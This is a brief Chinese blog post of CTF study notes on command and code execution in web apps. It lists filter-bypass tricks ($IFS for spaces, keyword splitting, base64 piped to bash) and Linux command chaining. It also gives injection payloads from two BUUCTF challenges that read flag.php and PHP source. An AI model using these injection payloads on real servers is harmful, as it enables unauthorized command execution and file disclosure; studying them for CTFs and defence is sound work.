web安全之命令执行、代码执行

基本知识

php中函数与语言结构的区别
读取文件函数:readfile('')  highlight_file('')
输出函数:echo   print_r     
输入函数:

bypass绕过


空格:$IFS$9  $(IFS)
关键字flag:fl\ag    拼接ab    反引号`ls`
无回显:
base64编码绕过:echo Y2F0IGZsYWcucGhw|base64 -d|bash     //cat flag.php


linux命令连接符:
A;B //先执行A,再执行B
A|B //只执行B那条命令
A||B //A执行失败才会执行B
A&B //AB两条命令都会执行
A&&B //A执行成功才会执行B

命令执行举例:#BUUCTF 【pingpingping-WP】


?ip=127.0.0.1;ls;
/?ip=127.0.0.1;cat flag.php;
?ip=127.0.0.1;cat$IFS$9flag.php;
?ip=127.0.0.1;a=g;tac$IFS$9fla$a.php;

代码执行举例:#BUUCTF 【禁止套娃-WP】


githack扫描出源代码-->分析源代码-->绕过:
?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

posted @ 2023-05-25 16:47  dustfree  阅读(45)  评论(0编辑  收藏  举报